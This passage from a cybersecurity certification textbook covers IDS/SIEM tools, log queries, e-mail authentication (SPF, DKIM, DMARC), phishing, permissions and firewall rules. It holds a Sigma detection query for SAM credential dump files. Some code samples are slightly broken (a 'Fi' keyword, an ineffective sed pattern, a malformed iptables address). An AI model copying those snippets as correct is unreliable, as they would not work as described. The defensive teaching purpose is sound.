goes one step further and can take actions to stop an intrusion.
Figure 11-15 shows output from an IDS. In the output, you can
see that for each intrusion attempt, the source and destination
IP addresses and port numbers are shown, along with a
description of the type of intrusion. In this case, all the alerts
have been generated by the same source IP address. Because
this is a private IP address, it is coming from inside your
network. It could be a malicious individual, or it could be a
compromised host under the control of external forces. As a
cybersecurity analyst, you should either block that IP address or
investigate to find out who has that IP address.
FIGURE 11-15 IDS Log
While the logs are helpful, one of the real values of an IDS is its
ability to present the data it collects in meaningful ways in
reports. For example, Figure 11-16 shows a pie chart created to
show the intrusion attempts and the IP addresses from which
the intrusions were sourced.
Figure 11-16 IDS Report Showing Blocked Intrusions by
Sources
Sourcefire
Sourcefire (now owned by Cisco) created products based on
Snort (covered in the next section). The devices Sourcefire
created were branded as Firepower appliances. These products
were next-generation IPSs (NGIPSs) that provided network
visibility into hosts, operating systems, applications, services,
protocols, users, content, network behavior, and network
attacks and malware. Sourcefire also included integrated
application control, malware protection, and URL filtering.
Figure 11-17 shows the Sourcefire Defense Center displaying the
numbers of events in the last hour in a graph. All the services
provided by these products are now incorporated into Cisco
firewall products. For more information on Sourcefire, see
https://www.cisco.com/c/en/us/services/acquisitions/sourcefi
re.html.
Figure 11-17 Sourcefire
Snort
Snort is an open source NIDS on which Sourcefire products are
based. It can be installed on Fedora, CentOS, FreeBSD, and
Windows. The installation files are free, but you need a
subscription to keep rule sets up to data. Figure 11-18 shows a
Snort report that has organized the traffic in the pie chart by
protocol. It also lists all events detected by various signatures
that have been installed. If you scan through the list, you can
see attacks such as URL host spoofing, oversized packets, and,
in row 10, a SYN FIN scan.
FIGURE 11-18 Snort
Zeek
Zeek is another open source NIDS. It is only supported on
Unix/Linux platforms. It is not as user friendly as Snort in that
configuring it requires more expertise. Like many other open
source products, it is supported by a nonprofit organization
called the Software Freedom Conservancy.
HIPS
A host-based IPS (HIPS) monitors traffic on a single system. Its
primary responsibility is to protect the system on which it is
installed. HIPSs typically work closely with anti-malware
products and host firewall products. They generally monitor the
interaction of sites and applications with the operating system
and stop any malicious activity or, in some cases, ask the user to
approve changes that the application or site would like to make
to the system. An example of a HIPS is SafenSoft SysWatch.
IMPACT ANALYSIS
When the inevitable security event occurs, especially if it results
in a successful attack, the impact of the event must be
determined. Impact analysis must be performed on several
levels to yield useful information. In Chapter 15, “The Incident
Response Process,” and Chapter 16, “Applying the Appropriate
Incident Response Procedure,” you will learn more about the
incident response process, but for now understand that the
purpose of an impact analysis is to
Identify what systems were impacted
Determine what role the quality of the response played in the
severity of the issue
For the future, associate the attack type with the systems that were
impacted
Organization Impact vs. Localized Impact
Always identify the boundaries of the attack or issue if possible.
This may result in a set of impacts that affected one small area
or environment while another set of issues may have impacted a
larger area. Defining those boundaries helps you to anticipate
the scope of a similar attack of that type in the future.
You might find yourself in a scenario where one office or LAN is
affected while others are not affected (localized). Even when
that is the case, it could result in a wider organizational impact.
For example, if a local office hosts all the database servers and
the attack is local to that office, it could mean database issues
for the entire organization.
Immediate Impact vs. Total Impact
While many attacks cause an immediate issue, some attacks
(especially some of the more serious) take weeks and months to
reveal their damage. When attacks occur, be aware of such a lag
in the effect and ensure that you continue to gather information
that can be correlated with previous attacks. The immediate
impact is what you see that alerts you, but the total impact
might not be known for weeks.
SECURITY INFORMATION AND EVENT
MANAGEMENT (SIEM) REVIEW
For large enterprises, the amount of log data that needs to be
analyzed can be quite large. For this reason, many organizations
implement security information and event
management (SIEM), which provides an automated solution
for analyzing events and deciding where the attention needs to
be given. Most SIEM products support two ways of collecting
logs from log generators:
Agentless: With this type of collection, the SIEM server receives
data from the individual hosts without needing to have any special
software installed on those hosts. Some servers pull logs from the
hosts, which is usually done by having the server authenticate to
each host and retrieve its logs regularly. In other cases, the hosts
push their logs to the server, which usually involves each host
authenticating to the server and transferring its logs regularly.
Regardless of whether the logs are pushed or pulled, the server then
performs event filtering and aggregation and log normalization and
analysis on the collected logs.
Agent-based: With this type of collection, an agent program is
installed on the host to perform event filtering and aggregation and
log normalization for a particular type of log. The host then
transmits the normalized log data to a SIEM server, usually on a
real-time or near-real-time basis, for analysis and storage. Multiple
agents may need to be installed if a host has multiple types of logs
of interest. Some SIEM products also offer agents for generic
formats such as Syslog and SNMP. A generic agent is used primarily
to get log data from a source for which a format-specific agent and
an agentless method are not available. Some products also allow
administrators to create custom agents to handle unsupported log
sources.
There are advantages and disadvantages to each method. The
primary advantage of the agentless approach is that agents do
not need to be installed, configured, and maintained on each
logging host. The primary disadvantage is the lack of filtering
and aggregation at the individual host level, which can cause
significantly larger amounts of data to be transferred over
networks and increase the amount of time it takes to filter and
analyze the logs. Another potential disadvantage of the
agentless method is that the SIEM server may need credentials
for authenticating to each logging host. In some cases, only one
of the two methods is feasible; for example, there might be no
way to remotely collect logs from a particular host without
installing an agent onto it.
Rule Writing
One of the key issues to a successful SIEM implementation is
the same issue you face with your firewall, IDS, and IPS
implementations: how to capture useful and actionable
information while reducing the amount of irrelevant data
(noise) from the collection process. Moreover, you want to
reduce the number of errors—false positives and false negatives
—the SIEM system makes. To review these error types, see
Chapter 3, “Vulnerability Management Activities.”
The key to reducing the amount of irrelevant data (noise) and
the number of errors is to write rules that guide the system in
making decisions. Rules are classified by the rule type. Some
example rule types are
Single event rule: If condition A happens, trigger an action.
Many-to-one or one-to-many rules: If condition A happens,
several scenarios are in play.
Cause-and-effect rules: If condition A matches and leads to
condition B, take an action. Example: “Password-guessing failure
followed by successful login” type scenarios.
Transitive rules or tracking rules: Here, the target in the first
event (N malware infection) becomes the source in the second event
(malware infection of another machine). This is typically used in
worm/malware outbreak scenarios.
Trending rules: Track several conditions over a time period,
based on thresholds. This happens in DoS or DDoS scenarios.
Known-Bad Internet Protocol (IP)
Many SIEM solutions include the capability to recognize IP
addresses and domain names from which malicious traffic has
been sourced in the past. IP, URL, and domain reputation data
is derived from the aggregated information of all the customers
of the SIEM solution. The system then prioritizes response
efforts by identifying known bad actors and infected sites.
This reputational data has another use as well. If your
organization’s IP addresses or domains appear in a blacklist or a
hacker forum, chances are that one or more of these systems
have been compromised, and compromise of public systems like
web servers can be just the tip of the iceberg, requiring further
investigation.
Dashboard
SIEM products usually include support for several dozen types
of log sources, such as OSs, security software, application
servers (for example, web servers and e-mail servers), and even
physical security control devices such as badge readers. For
each supported log source type, except for generic formats such
as Syslog, the SIEM products typically know how to categorize
the most important logged fields. This significantly improves
the normalization, analysis, and correlation of log data over that
performed by software with a less granular understanding of
specific log sources and formats. Also, the SIEM software can
perform event reduction by disregarding data fields that are not
significant to computer security, potentially reducing the SIEM
software’s network bandwidth and data storage usage. Figure
11-19 shows output from a SIEM system. Notice the various
types of events that have been recorded.
FIGURE 11-19 SIEM Output
The tool in Figure 11-19 shows the name or category within
which each alert falls (Name column), the attacker’s address, if
captured, the target IP address, and the priority of the alert
(Priority column, denoted by color). Given this output, the
suspicious FTP traffic (high priority) needs to be investigated.
While only three are shown on this page, if you look at the topright corner, you can see that there are a total of 83 alerts with
high priority, many of which are likely to be suspicious e-mail
attachments.
The following are examples of product dashboards:
ArcSight: ArcSight, owned by HP, sells SIEM systems that collect
security log data from security technologies, operating systems,
applications, and other log sources and analyze that data for signs
of compromise, attacks, or other malicious activity. The solution
comes in a number of models, based on the number of events the
system can process per second and the number of devices
supported. The selection of the model is important to ensure that
the device is not overwhelmed trying to access the traffic. This
solution also can generate compliance reports for HIPAA, SOX, and
PCI DSS. For more information, see
https://www.microfocus.com/en-us/products/siem-logmanagement/overview.
QRadar: The IBM SIEM solution, QRadar, purports to help
eliminate noise by applying advanced analytics to chain multiple
incidents together and identify security offenses requiring action.
Purchase also permits access to the IBM Security App Exchange for
threat collaboration and management. For information, see
https://www.ibm.com/security/security-intelligence/qradar.
Splunk: Splunk is a SIEM system that can be deployed as a
premises-based or cloud-based solution. The data it captures can be
analyzed using searches written in Splunk Search Processing
Language (SPL). Splunk uses machine-driven data imported by
connectors or add-ons. For example, the Splunk add-on for Oracle
Database allows a Splunk software administrator to collect and
ingest data from an Oracle database server. See more at
https://www.splunk.com/en_us/cyber-security.html.
AlienVault/OSSIM: AlienVault (now AT&T Cybersecurity)
produces both commercial and open source SIEM systems. Open
Source Security Information Management (OSSIM) is the open
source version, and the commercially available AlienVault Unified
Security Management (USM) goes beyond traditional SIEM
software with all-in-one security essentials and integrated threat
intelligence. Figure 11-20 shows the Executive view of the
AlienVault USM console. See more at
https://cybersecurity.att.com/?
utm_source=bing&utm_medium=cpc&utm_term=kwd28340254695:loc190&utm_campaign=140645415&source=EBPS0000000PSM00P
&WT.srch=1&wtExtndSource=&wtpdsrchprg=AT%26T%20ABS&w
tpdsrchgp=ABS_SEARCH&wtPaidSearchTerm=alienvault&wtpdsr
chpcmt=alienvault&kid=kwd-28340254695:loc-
190&cid=140645415&msclkid=b2f3090f87611f60019e57f75d673cf
d&utm_source=bing&utm_medium=cpc&utm_campaign=ACS_B
RAND-NA-MSNSE&utm_term=alienvault&utm_content=AlienVault&gclid=CMjYv
OeKpeoCFQpbgQodo70GlQ&gclsrc=ds.
Figure 11-20 AlienVault
QUERY WRITING
Queries are simply questions formed and used to locate data
that matches specific characteristics. Query writing is the
process of forming a query that locates the information for
which you are looking. Properly formed queries can help you to
locate the security needle in the haystack when it comes to
analyzing log data. We’ve already discussed the vast amount of
information that can be collected by SIEM and other types of
systems.
Sigma is an open standard for writing rules that allow you to
describe searches on log data in generic form. These rules can
be converted and applied to many log management or SIEM
systems and can even be used with grep on the command line.
The following is an example of a rule written using Sigma. The
rule is named sigmac and its target is splunk. It’s looking for an
event with an ID of 11.
Click here to view code image
$ python3 sigmac -t splunk
../rules/windows/sysmon/sysmon_quarkspw_
filedump.yml (EventID="11"
TargetFileName="*\AppData\Local\Temp\
SAM-*.dmp*")
String Search
String searches are used to look within a log file or data
stream and locate any instances of that string. A string can be
any combination of letters, numbers, and other characters.
String searches are used to locate malware and to locate strings
that are used in attacks or typically accompany an attack.
String searches can be performed by using either search
algorithms or regular expressions, but many audit tools such as
SIEM (and many sniffers as well) offer GUI tools that allow you
to form the search by choosing from options. Figure 11-21 shows
a simple search formed in Splunk to filter out all but items
including either of two strings, visudo or usermod.
Script
Scripts can be used to combine and orchestrate functions or to
automate responses. A simple example is the following script
that tests for the presence of lowercase letters in passwords and
responds when no lowercase letter is present:
Click here to view code image
chop=$(echo "$password" | sed -E 's/:lower://g')
echo "chopped to $chop"
if [ "$password" == "$chop" ] ; then
echo "Fail: You haven't used any lowercase letters."
Fi
FIGURE 11-21 String Search in Splunk
Piping
Piping is the process of sending the output of one function to
another function as its input. Piping is used in scripting to link
together functions and orchestrate their operation. The symbol |
denotes a pipe. For example, in the following Linux command,
by piping the output of the cat filename command to the less
command, the less command alters the display of the output:
cat filename | less
Normally the output would be displayed scrolled all the way to
the end of the file. The less command prevents that from
occurring.
Anther use of piping is to search for a set of items and then use
a second function to search within that set or to perform some
process on that output.
E-MAIL ANALYSIS
One of the most popular avenues for attacks is a tool we all must
use every day, e-mail. This section covers several attacks that
use e-mail as the vehicle. In most cases the best way to prevent
these attacks is user training and awareness, because many of
these attacks are based upon poor security practices on the part
of the user. Email analysis is a part of security monitoring.
E-mail Spoofing
E-mail spoofing is the process of sending an e-mail that appears
to come from one source when it really comes from another. It
is made possible by altering the fields of e-mail headers such as
From, Return Path, and Reply-to. Its purpose is to convince the
receiver to trust the message and reply to it with some sensitive
information that the receiver would not have shared unless it
was a trusted message.
Often this is one step in an attack designed to harvest
usernames and passwords for banking or financial sites. This
attack can be mitigated in several ways. One is SMTP
authentication, which when enabled, disallows the sending of
an e-mail by a user that cannot authenticate with the sending
server.
Malicious Payload
E-mail is a frequent carrier of malware; in fact, e-mail is the
most common vehicle for infecting computers with malware.
You should employ malware scanning software on both the
client machines and the e-mail server. Despite taking this
measure, malware can still get through, and it is imperative to
educate users to follow safe e-mail handling procedures (such as
not opening attachments from unknown sources). Training
users is critical.
DomainKeys Identified Mail (DKIM)
DomainKeys Identified Mail (DKIM) allows you to verify
the source of an e-mail. It provides a method for validating a
domain name identity that is associated with a message through
cryptographic authentication. Figure 11-22 shows the process.
As you can see, the e-mail server verifies the domain name
(actually what’s called the DKIM signature) with the DNS
server first before delivering the e-mail.
Figure 11-22 DKIM Process
Sender Policy Framework (SPF)
Another possible mitigation technique is to implement a
Sender Policy Framework (SPF). An SPF is an e-mail
validation system that works by using DNS to determine
whether an e-mail sent by someone has been sent by a host
sanctioned by that domain’s administrator. If it can’t be
validated, it is not delivered to the recipient’s box.
Domain-based Message Authentication, Reporting, and
Conformance (DMARC)
Domain-based Message Authentication, Reporting,
and Conformance (DMARC) is an e-mail authentication
and reporting protocol that improves e-mail security within
federal agencies. All federal agencies are required to implement
this standard, which improves e-mail security. Protocols (SPF,
DKIM) authenticate e-mails to ensure they are coming from a
valid source. A DMARC policy allows a sender’s domain to
indicate that its e-mails are protected by SPF and/or DKIM, and
tells a receiver what to do if neither of those authentication
methods passes—such as to reject the message or quarantine it.
Figure 11-23 illustrates a workflow whereby DMARC
implements both SPF and DKIM, along with a virus filter.
Figure 11-23 DMARC
Phishing
Phishing is a social engineering attack in which attackers try
to learn personal information, including credit card information
and financial data. This type of attack is usually carried out by
implementing a fake website that very closely resembles a
legitimate website. Users enter data, including credentials, on
the fake website, allowing the attackers to capture any
information entered.
As a part of assessing your environment, you should send out
phishing e-mails to assess the willingness of your users to
respond. A high number of successes indicates that users need
training to prevent successful phishing attacks.
Spear Phishing
Spear phishing is the process of foisting a phishing attack on a
specific person rather than a random set of people. The attack
might be made more convincing by learning details about the
person through social media that the e-mail might reference to
boost its appearance of legitimacy. Spear phishing is carried out
against a specific target by learning about the target’s habits and
likes. Spear phishing attacks take longer to carry out than
phishing attacks because of the information that must be
gathered.
Whaling
Just as spear phishing is a subset of phishing, whaling is a
subset of spear phishing. It targets a single person, and in the
case of whaling, that person is someone of significance or
importance. It might be a CEO, COO, or CTO, for example. The
attack is based on the assumption that these people have more
sensitive information to divulge.
Note
Pharming is similar to phishing, but pharming actually pollutes the contents of a
computer’s DNS cache so that requests to a legitimate site are actually routed to
an alternate site.
Caution users against using any links embedded in e-mail
messages, even if a message appears to have come from a
legitimate entity. Users should also review the address bar any
time they access a site where their personal information is
required, to ensure that the site is correct and that SSL/TLS is
being used, which is indicated by an HTTPS designation at the
beginning of the URL address.
Forwarding
No one enjoys the way our e-mail boxes fill every day with
unsolicited e-mails, usually trying to sell us something. In many
cases we cause ourselves to receive this e-mail by not paying
close attention to all the details when we buy something or visit
a site. When e-mail is sent out on a mass basis that is not
requested, it is called spam.
Spam is more than an annoyance because it can clog e-mail
boxes and cause e-mail servers to spend resources delivering it.
Sending spam is illegal, so many spammers try to hide the
source of the spam by relaying or forwarding through other
corporations’ e-mail servers. Not only does this practice hide
the e-mail’s true source, but it can cause the relaying company
to get in trouble.
Today’s e-mail servers have the ability to deny relaying to any email servers that you do not specify. This can prevent your email system from being used as a spamming mechanism. This
type of relaying should be disallowed on your e-mail servers. In
addition, spam filters can be implemented on personal e-mail,
such as web-based e-mail clients.
Digital Signature
A digital signature added to an e-mail is a hash value
encrypted with the sender’s private key. A digital signature
provides authentication, non-repudiation, and integrity. A blind
signature is a form of digital signature where the contents of the
message are masked before it is signed. The process for creating
a digital signature is as follows:
1. The signer obtains a hash value for the data to be signed.
2. The signer encrypts the hash value using her private key.
3. The signer attaches the encrypted hash and a copy of her public key
in a certificate to the data and sends the message to the receiver.
The process for verifying the digital signature is as follows:
1. The receiver separates the data, encrypted hash, and certificate.
2. The receiver obtains the hash value of the data.
3. The receiver verifies that the public key is still valid by using the
PKI.
4. The receiver decrypts the encrypted hash value using the public
key.
5. The receiver compares the two hash values. If the values are the
same, the message has not been changed.
Public key cryptography, discussed in Chapter 8, “Security
Solutions for Infrastructure Management,” is used to create
digital signatures. Users register their public keys with a
certificate authority (CA), which distributes a certificate
containing the user’s public key and the CA’s digital signature.
The digital signature is computed by the user’s public key and
validity period being combined with the certificate issuer and
digital signature algorithm identifier.
The Digital Signature Standard (DSS) is a U.S. federal
government digital security standard that governs the Digital
Security Algorithm (DSA). DSA generates a message digest of
160 bits. The U.S. federal government requires the use of DSA,
RSA, or Elliptic Curve DSA (ECDSA) and SHA for digital
signatures. DSA is slower than RSA and provides only digital
signatures. RSA provides digital signatures, encryption, and
secure symmetric key distribution. In a review of cryptography,
keep the following facts in mind:
Encryption provides confidentiality.
Hashing provides integrity.
Digital signatures provide authentication, non-repudiation, and
integrity.
E-mail Signature Block
An e-mail signature block is a set of information, such as
name, e-mail address, company title, and credentials, that
usually appears at the end of an e-mail. Many organizations
choose to determine the layout of the signature block and its
contents to achieve consistency in how the company appears to
the outside world. Another reason for this, however, is to
prevent the disclosure of information that could be used at
some point in time for an attack.
It is also important to control what users can put in these
signature blocks to ensure that users do not inadvertently create
a legal obligation on the part of the organization.
Embedded Links
Many times, e-mails are received that have embedded links in
them. These links may appear to lead to one site based on the
text you see on the page but if you scroll over the link (revealing
what is called an embedded link) the actual site to which you
will be directed will be shown and they may be completely
different. There’s not much you can do to prevent users from
clicking on these links other than train them to review the
embedded links in e-mails before accessing them.
Impersonation
Impersonation is the process of acting as another entity and
is done to gain unauthorized access to resources or networks. It
can be done by adopting another’s IP address, MAC address, or
user account. It can also be done at the e-mail level. E-mail can
be spoofed by altering the SMTP header of the e-mail. This
allows the e-mail to appear to come from another source.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 11-8
lists a reference of these key topics and the page numbers on
which each is found.
Table 11-8 Key Topics in Chapter 11
Key Topic
Element
Description
Page
Number
Figure 11-1
Trend analysis
321
Bulleted
list
Endpoint protection platforms (EPPs)
322
Bulleted
list
Malware types
323
Bulleted
list
Virus types
324
Figure 11-2
Botnet
326
Bulleted
list
Integrity checking methods
327
Bulleted
list
Reverse engineering tools
328
Figure 11-3
Secure memory
331
Figure 11-4
Runtime data integrity check
331
Bulleted
list
Memory-reading tools
332
Table 11-2
Runtime debugging tools
332
Bulleted
list
Indicators of a compromised
application
334
Bulleted
list
Social engineering threats
335
Bulleted
list
Server attacks
337
Bulleted
list
Database security terms
339
Table 11-3
SFC switches
341
Section
Description of user and entity
behavior analytics (UEBA)
341
Figure 11-6
Domain generation algorithm
344
Bulleted
list
Syslog information
350
Table 11-4
Parts of a standard Syslog message
352
Table 11-5
Check Point Firewall fields
354
Section
Description of web application
firewall (WAF)
355
Table 11-7
Advantages and disadvantages of
WAF placement options
356
Bulleted
list
SIEM collection types
362
Bulleted
list
Search rule types
363
Figure 1122
DKIM process
368
Numbered
lists
Processes for creating and verifying a
digital signature
371
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
heuristics
trend analysis
NIST SP 800-128
mobile code
virus
worm
Trojan horse
logic bomb
adware
spyware
botnet
rootkit
ransomware
reverse engineering
isolation
sandboxing
hashing
decomposition
runtime data integrity check
secured memory
memory dumping
runtime debugging
rogue endpoints
rogue access points
denial-of-service (DoS) attack
buffer overflow
emanations
backdoor/trapdoor
inference
aggregation
contamination
user and entity behavior analytics (UEBA)
domain generation algorithm (DGA)
flow analysis
NetFlow
packet analysis
protocol analysis
Syslog
web application firewall (WAF)
proxy
intrusion detection system (IDS)
intrusion prevention system (IPS)
impact analysis
security information and event management (SIEM)
query writing
string searches
piping
DomainKeys Identified Mail (DKIM)
Domain-based Message Authentication Reporting, and
Conformance (DMARC)
Sender Policy Framework (SPF)
phishing
forwarding
digital signature
e-mail signature block
embedded links
impersonation
REVIEW QUESTIONS
1. ActiveX, Java, and JavaScript are examples of
_______________.
2. List and define at least two types of viruses.
3. Match the following terms with their definitions.
Terms
Definitions
Rootk
it
Taking something apart to discover how it works and
perhaps to replicate it
Ranso
mwar
e
Place where it is safe to probe and analyze malware
Rever
se
engin
eering
A set of tools that a hacker can use on a computer after
he has managed to gain access and elevate his privileges
to administrator
Sandb
ox
Prevents or limits users from accessing their systems
until they pay money
4. ____________________ is a partition designated as
security-sensitive.
5. List and define at least two forms of social engineering.
6. Match the following terms with their definitions.
Terms
Ema
natio
ns
Definitions
A mechanism implemented in many devices or
applications that gives the user who uses the backdoor
unlimited access to the device
Buffe
r
overf
low
Software that is transmitted across a network to be
executed on a local system
Mobi
le
code
Electromagnetic signals that are emitted by an
electronic device
Back
door/
trapd
oor
Occurs when the amount of data that is submitted to an
application is larger than the buffer can handle
7. ______________________________ is a technology
developed by Cisco that is supported by all major vendors
and can be used to collect and subsequently export IP traffic
accounting information.
8. List at least two parts of a Syslog message.
9. Match the following terms with their definitions.
Ter
ms
Definitions
I
P
S
System that can alert when a security event occurs
W
A
F
A server, application, or appliance that acts as an
intermediary for requests from clients seeking resources
from servers
P
r
o
x
y
System that can take an action when a security event occurs
I
D
S
System that examines all web input before processing and
applies rule sets to an HTTP conversation
10. ______________________ enables you to verify the
source of an e-mail.
Chapter 12
Implementing
Configuration Changes to
Existing Controls to
Improve Security
This chapter covers the following topics related to Objective 3.2
(Given a scenario, implement configuration changes to existing
controls to improve security) of the CompTIA Cybersecurity
Analyst (CySA+) CS0-002 certification exam:
Permissions: Discusses the importance of proper permissions
management.
Whitelisting: Covers the process of whitelisting and its
indications.
Blacklisting: Describes a blacklisting process used to deny access.
Firewall: Identifies key capabilities of various firewall platforms.
Intrusion prevention system (IPS) rules: Discusses rules
used to automate response.
Data loss prevention (DLP): Covers the DLP process used to
prevent exfiltration.
Endpoint detection and response (EDR): Describes a
technology that addresses the need for continuous monitoring.
Network access control (NAC): Identifies the processes used by
NAC technology.
Sinkholing: Discusses the use of this networking tool.
Malware signatures: Describes the importance of malware
signatures and development/rule writing.
Sandboxing: Reviews the use of this software virtualization
technique to isolate apps from critical system resources.
Port Security: Covers the role of port security in preventing
attacks.
In many cases, security monitoring data indicates a need to
change or implement new controls to address new threats.
These changes might be small configuration adjustments to a
security device or they might include large investments in new
technology. Regardless of the scope, these actions should be
driven by the threat at hand and the controls should be exposed
to the same cost/benefit analysis to which all organizational
activities are exposed.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these 12 self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table
12-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 12-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Permissions
1
Whitelisting
2
Blacklisting
3
Firewall
4
Intrusion Prevention System (IPS) Rules
5
Data Loss Prevention (DLP)
6
Endpoint Detection and Response (EDR)
7
Network Access Control (NAC)
8
Sinkholing
9
Malware Signatures
10
Sandboxing
11
Port Security
12
1. Which of the following is an example of a right and not a
permission?
1. Read access to a file
2. Ability to delete a file
3. Ability to reset passwords
4. Ability to change the permissions of a file
2. When you allow a file type at the exclusion of all other file
types, you have created what?
1. Whitelist
2. Access list
3. Blacklist
4. Graylist
3. Which of the following requires the most effort to maintain?
1. Whitelist
2. Access list
3. Blacklist
4. Graylist
4. Which of the following is a category of devices that attempt
to address traffic inspection and application awareness
shortcomings of a traditional stateful firewall?
1. NGFW
2. Bastion host
3. Three-legged firewall
4. Proxy
5. Which of the following is a type of IPS and is an expert
system that uses a knowledge base, an inference engine, and
programming?
1. Rule-based
2. Signature-based
3. Heuristics-based
4. Error-based
6. Preventing data exfiltration is the role of which of the
following?
1. Trend analysis
2. DLP
3. NAC
4. Port security
7. Which of the following shifts security from a reactive threat
approach to one that can detect and prevent threats before
they reach the organization?
1. NAC
2. DAC
3. EDR
4. DLP
8. Which of the following is a service that goes beyond
authentication of the user and includes examination of the
state of the computer the user is introducing to the network
when making a remote-access or VPN connection to the
network?
1. NAC
2. DAC
3. EDR
4. DLP
9. Which of the following can be used to prevent a
compromised host from communicating back to the
attacker?
1. Sinkholing
2. DNSSec
3. NASC
4. Port security
10. Which of the following could be a filename or could be some
series of characters that can be tied uniquely to the
malware?
1. Key
2. Signature
3. Fingerprint
4. Scope
11. Which of the following allows you to run a possibly
malicious program in a safe environment so that it doesn’t
infect the local system?
1. Sandbox
2. Secure memory
3. Secure enclave
4. Container
12. Which of the following is referred to as Layer 2 security?
1. Sandbox
2. Port security
3. Encoding
4. Subnetting
FOUNDATION TOPICS
PERMISSIONS
Permissions are granted or denied at the file, folder, or other
object level. Common permission types include Read, Write,
and Full Control. Data custodians or administrators will grant
users permissions on a file or folder based on the file owner’s
request to do so.
Rights allow administrators to assign specific privileges and
logon rights to groups or users. Rights manage who is allowed
to perform certain operations on an entire computer or within a
domain, rather than on a particular object within a computer.
While user permissions are granted by an object’s owner, user
rights are assigned using a computer’s local security policy or a
domain security policy. User rights apply to user accounts,
while permissions apply to objects.
Rights include the ability to log on to a system interactively,
which is a logon right, or the ability to back up files, which is
considered a privilege. User rights are divided into two
categories: privileges and logon rights. Privileges are the right of
an account, such as a user or group account, to perform various
system-related operations on the local computer, such as
shutting down the system, loading device drivers, or changing
the system time. Logon rights control how users are allowed
access to the computer, including logging on locally or through
a network connection or whether as a service or as a batch job.
Conflicts can occur in situations where the rights that are
required to administer a system overlap the rights of resource
ownership. When rights conflict, a privilege overrides a
permission.
WHITELISTING AND BLACKLISTING
Whitelisting occurs when a list of acceptable e-mail
addresses, Internet addresses, websites, applications, or some
other identifier is configured as good senders or as allowed to
send. Blacklisting identifies bad senders. Graylisting is
somewhere in between the two, listing entities that cannot be
identified as whitelist or blacklist items. In the case of
graylisting, the new entity must pass through a series of tests to
determine whether it will be whitelisted or blacklisted.
Whitelisting, blacklisting, and graylisting are commonly used
with spam filtering tools. But there are other uses for whitelists
and blacklists as well. They are used in routes to enforce ACLs
and in switches to enforce port security.
Application Whitelisting and Blacklisting
Application whitelists are lists of allowed applications (with all
others excluded), and blacklists are lists of prohibited
applications (with all others allowed). It is important to control
the types of applications that users can install on their
computers. Some application types can create support issues,
and others can introduce malware. It is possible to use Windows
Group Policy to restrict the installation of software on network
computers, as illustrated in Figure 12-1. Using Windows Group
Policy is only one option, and each organization should select a
technology to control application installation and usage in the
network.
Figure 12-1 Software Restrictions
Input Validation
Input validation is the process of checking all input for things
such as proper format and proper length. In many cases, these
validators use either the blacklisting of characters or patterns or
the whitelisting of characters or patterns. Blacklisting looks for
characters or patterns to block. It can prevent legitimate
requests. Whitelisting looks for allowable characters or patterns
and only allows those. The length of the input should also be
checked and verified to prevent buffer overflows.
FIREWALL
Chapter 11, “Analyzing Data as Part of Security Monitoring
Activities,” discussed firewall logs and Chapter 8, “Security
Solutions for Infrastructure Management,” discussed the
various architectures used in firewalls; at this point we need to
look a little more closely at firewall types and their placement
for effective operation. Firewalls can be software programs
that are installed over server or client operating systems or
appliances that have their own operating system. In either case,
the job of a firewall is to inspect and control the type of traffic
allowed.
NextGen Firewalls
Next-generation firewalls (NGFWs) are a category of
devices that attempt to address traffic inspection and
application awareness shortcomings of a traditional stateful
firewall, without hampering the performance. Although unified
threat management (UTM) devices also attempt to address
these issues, they tend to use separate internal engines to
perform individual security functions. This means a packet may
be examined several times by different engines to determine
whether it should be allowed into the network.
NGFWs are application aware, which means they can
distinguish between specific applications instead of allowing all
traffic coming in via typical web ports. Moreover, they examine
packets only once, during the deep packet inspection phase
(which is required to detect malware and anomalies). The
following are some of the features provided by NGFWs:
Nondisruptive inline configuration (which has little impact on
network performance)
Standard first-generation firewall capabilities, such as network
address translation (NAT), stateful protocol inspection (SPI), and
virtual private networking
Integrated signature-based IPS engine
Application awareness, full stack visibility, and granular control
Ability to incorporate information from outside the firewall, such as
directory-based policy, blacklists, and whitelists
Upgrade path to include future information feeds and security
threats and SSL/TLS decryption to enable identifying undesirable
encrypted applications
An NGFW can be placed inline or out-of-path. Out-of-path
means that a gateway redirects traffic to the NGFW, while inline
placement causes all traffic to flow through the device. Figure
12-2 shows the two placement options for NGFWs.
FIGURE 12-2 Placement of an NGFW
Table 12-2 lists the advantages and disadvantages of NGFWs.
Table 12-2 Advantages and Disadvantages of NGFWs
Advantages
Disadvantages
Provides enhanced security
Is more involved to manage than
a standard firewall
Provides integration
between security services
Leads to reliance on a single
vendor
May save costs on appliances
Performance can be impacted
Host-Based Firewalls
A host-based firewall resides on a single host and is
designed to protect that host only. Many operating systems
today come with host-based (or personal) firewalls. Many
commercial host-based firewalls are designed to focus attention
on a particular type of traffic or to protect a certain application.
On Linux-based systems, a common host-based firewall is
iptables, which replaces a previous package called ipchains. It
has the ability to accept or drop packets. You create firewall
rules much as you create an access list on a router. The
following is an example of a rule set:
Click here to view code image
iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP
iptables -A INPUT -i eth1 -s 172. -j DROP
This rule set blocks all incoming traffic sourced from either the
192.168.0.0/24 network or the 10.0.0.0/8 network. Both of
these are private IP address ranges. It is quite common to block
incoming traffic from the Internet that has a private IP address
as its source, as this usually indicates that IP spoofing is
occurring. In general, the following IP address ranges should be
blocked as traffic sourced from these ranges is highly likely to be
spoofed:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
224.0.0.0/4
240.0.0.0/5
127.0.0.0/8
The 224.0.0.0/4 range covers multicast traffic, and the
127.0.0.0/8 range covers traffic from a loopback IP address.
You may also want to include the APIPA 169.254.0.0 range as
well, as it is the range in which some computers give themselves
IP addresses when the DHCP server cannot be reached. On a
Microsoft computer, you can use Windows Defender to block
these ranges.
